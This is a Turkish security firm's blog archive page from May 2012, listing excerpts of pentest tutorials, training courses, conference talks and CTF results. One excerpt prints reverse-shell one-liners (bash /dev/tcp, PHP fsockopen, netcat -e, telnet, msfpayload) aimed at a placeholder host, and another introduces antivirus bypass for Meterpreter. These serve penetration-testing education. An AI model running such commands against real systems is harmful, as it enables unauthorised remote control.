2012 Mayıs ARŞİVİ

BGA Blog yazıları

Antivirus Bypass Teknikleri ve Tanınmaz Meterpreter Ajanı Oluşturma
2012

Antivirus Bypass Teknikleri ve Tanınmaz Meterpreter Ajanı Oluşturma

Pentest çalışmalarında, hedef sistemi ele geçirdikden sonra yetkisiz işlevleri yerine getirecek bir payload'a ihtiyaç duyulur. Bu bir casus yazılım olabilir (trojan), uzakdan yönetim aracı olabilir (rat) veya hedef sistemde kod/komut çalıştırmanıza olanak sağlayan bir araç   (shellcode exec) olabilir.BGA pentest ekibi, pentest çalışmalarında ve eğitimlerde multi platform çalışan ve gelişmiş özellikleri olan meterpreter payloadını sıklıkla tercih etmektedir.Antivirus veya sezgisel antilogger'lar bu tür durumlarda işinizi zorlaştırabilir. Bu yazıda, antiviruslerin çalışma prensiblerine kısaca değinilmiş…
Devamı
2012

Veri tabanı Güvenliği Denetim Teknikleri Eğitimi

Eğitim AçıklamasıVeri tabanı sistemleri bilgi çağının en önemli bileşenlerinden biridir ve her kurum için hayati önem taşır. Teknolojinin gelişmesi ve bilgiye erişilebilirliğin artmasıyla beraber bilginin güvenliğinin sağlanması ciddi derecede önem kazanmıştır, bununla beraber erişim ihlalleri giderek artmaktadır.Erişim ihlallerinin önüne geçmek için bir takım önlemler alınmaktadır, bu önemlerin bir kısmı regülasyonlarla bir kısmı ise teknik yeterliliklerle sağlanmaktadır.Eğitimde uçtan uca veri tabanı güvenliğinin teknik ve regüslasyon tarafları derinlemesine incelenecek, birebir uygulamalarla zenginleştirilecektir.Eğitim tüm veritabanı…
Devamı
PCI DSS Uyumluluğu için SSL Kontrolleri
2012

PCI DSS Uyumluluğu için SSL Kontrolleri

PCI DSS nedir?PCI DSS (Ödeme Kartları Endüstrisi Veri Güvenliği Standardı), kartlı ödeme sistemlerinde veri güvenliğini sağlama amacıyla American Express, JCB, DFS, MasterCard Worldwide ve Visa International katılımıyla oluşturulmuş komite tarafından geliştirilmiş bir standarttır. Diğer standartlardan farklı olarak PCI DSS standart maddelerinde detaylı bilgilendirme yapmaktadır.PCI DSS, kartlı sistemler üzerindeki işlem sayısına göre firmalar farklı kategorilerde sınıflandırılmış  ve her kategori için sorumluluklar belirlenmiştir. Bu sorumluluklardan biri de yılda 4 kere uzaktan güvenlik testi gerçekleştirmektir.PCI…
Devamı
Firewall Arkasındaki Sistemler İçin Pratik Reverse Shell Alma Yöntemleri
2012

Firewall Arkasındaki Sistemler İçin Pratik Reverse Shell Alma Yöntemleri

"Nat Arkasındaki Sistemler İçin Reverse Shell Alma Yöntemleri" konulu blog girdisinde, NAT arkasındaki sistemlere erişim mantığı ve örnek netcat uygulaması yer alıyor. Bu yazıda, farklı durumlarda pratik olarak reverse shell alma teknikleri bulunuyor;Not: Dinleme modunda "nc -lvp 443" komutu kullanılabilir.BASHbash -i >& /dev/tcp/1.1.1.1/443 0>&1  (Red hat tabanlı sistemler için)PHPphp -r '$sock=fsockopen("1.1.1.1",443);exec("/bin/sh -i <&3 >&3 2>&3");'Netcatnc -e /bin/sh 1.1.1.1 443Telnettelnet 1.1.1.1 4444 | /bin/bash | telnet 1.1.1.1 443Windows Reverse Shell (metasploit)#msfpayload windows/shell/reverse_tcp LHOST=1.1.1.1…
Devamı
Siber Güvenlik Yaz Kampı 2012
2012

Siber Güvenlik Yaz Kampı 2012

Geçtiğimiz yıl 1.sini düzenlediğimiz Siber Güvenlik Yaz Kampı'nı bu yıl TÜBİTAK ile ortaklaşa düzenliyoruz.  Bilişim teknolojilerinin son yıllarda hayatın her alanına nüfuz etmesiyle birlikte artan güvenlik ihtiyacı ile birlikte ortaya çıkan yetişmiş siber güvenlik uzmanı açığı son yıllarda bu alandaki eğitim programlarına olan gereksinimi her zamankinden daha büyük hale gelmiştir.TÜBİTAK ve Bilgi Güvenliği Akademisi, Türkiye’de siber güvenlik uzmanı eksikliğinin giderilmesine destek olmak ve kapasite geliştirilmesini sağlamak amacıyla üniversite öğrencilerine yönelik “Siber Güvenlik…
Devamı
BGA Osmangazi Üniversitesi Bilişim Günleri 2012′de
2012

BGA Osmangazi Üniversitesi Bilişim Günleri 2012′de

21-22 MAyıs 2012 tarihleri arasında gerçekleştirilecek olan Eskişehir Osmangazi Üniversitesi Bilişim Günleri 2012 etkinliğinde Bilgi Güvenliği AKADEMİSİ'den Huzeyfe ÖNAL " Yeni Nesil Siber Tehditler ve Savunma Yöntemleri" konulu bir sunum gerçekleştirecektir.Etkinlik hakkında detay bilgi için http://www.esogubilisimgunleri.com
Devamı
2012

Bilgisayar Ağlarında Adli Bilişim Analizi Eğitimi(İstanbul)

Eğitim TanımıGünümüz sosyal yaşamın parçası haline gelen siber dünyaya bağımlılık arttıkça bu durum suç odaklarının da dikkatini çekmiş ve bilişim sistemleri suç aracı olarak kullanılmaya başlanmıştır.Bilişim suçlarının araştırılmasında en önemli hususlardan birisi sayısal kanıtlardır. Bilişim sistemi denildiğinde akla gelen ilk sözcüklerden biri “ağ “ olmaktadır. Bağlantısız (ağsız) bilgisayar tekerliksiz araca benzer özlü sözünün doğruluğunu kanıtlar nitelikte tüm bilişim suçlarında en önemli bileşen “ağ” kavramı olmaktadır.Bu ağ yeri geldiğinde internet, yeri geldiğinde yerel/özel…
Devamı
Nopcon İstanbul Bilgi Güvenliği Konferansı
2012

Nopcon İstanbul Bilgi Güvenliği Konferansı

21 Mayıs'ta Istanbul Bilgi Üniversite'sinde düzenlenecek olan NOPcon Bilgi Güvenliği Konferansına, BGA Bilgi Güvenliği AKADEMİSİ adına Ozan UÇAR, "Advanced Network Pentest" konulu workshop ile katılım gösterecektir. Workshop, gerçek dünyadan pratik uygulamalar ve BGA tarafından düzenlenen CTF yarışmasının detaylarını içerecektir.Konferans hakkında detaylı bilgi almak için, konferans anasayfasından faydalanabilirsiniz. http://www.nopcon.org
Devamı
BGA CTF 2012 Sonuçları
2012

BGA CTF 2012 Sonuçları

Samsung Galaxy Tab10 hediyeli  Capture The Flag Ethical Hacking yarışması bitti. Yarışmaya toplamda yaklaşık 500 kişi katıldı ve bunlardan 40 civarı grup adı ile yarıştı. Maalesef yarışmanın tüm adımlarını geçen grup olmadı.Yarışma toplam 6 adımdan oluştu ve her bir adım bir sonraki ile bağlantılıydı. Gruplar en fazla 4. adıma kadar gelebildiler. 5. ve 6. adımlar çözülemedi. Çözülemeyen bu adımlar daha sonra yapılacak CTF lerde kullanacaktır.Yarışmaya katılan herkese çok teşekkür ediyoruz. Gösterdikleri ilgiye…
Devamı
Vmware Sanallaştırma Sistemlerine Yönelik Keşif ve Bilgi Toplama
Teknikleri
2012

Vmware Sanallaştırma Sistemlerine Yönelik Keşif ve Bilgi Toplama Teknikleri

Metsploit Framework aracında bulunan VMware Auxiliary modülleri ile, yerel ağdaki vmware sistemlerini, vmware kullanıcı ve gruplarını tespit edebilir ve yetkileri hakkında bilgi toplayabilirsiniz. Vmhost ESX/ESXI üzerinde mi çalışıyor, versiyon bilgilerini alabilirsiniz. VMWare ile ilgili tüm yardımcı araçları bulmak için aşağıdaki arama komutunu kullanabilirsiniz;msf > search type:auxiliary vmwareMatching Modules================Name Disclosure Date Rank Description---- --------------- ---- -----------auxiliary/admin/vmware/poweroff_vm normal VMWare Power Off Virtual Machineauxiliary/admin/vmware/poweron_vm normal VMWare Power On Virtual Machineauxiliary/admin/vmware/tag_vm normal VMWare Tag Virtual Machineauxiliary/admin/vmware/terminate_esx_sessions normal…
Devamı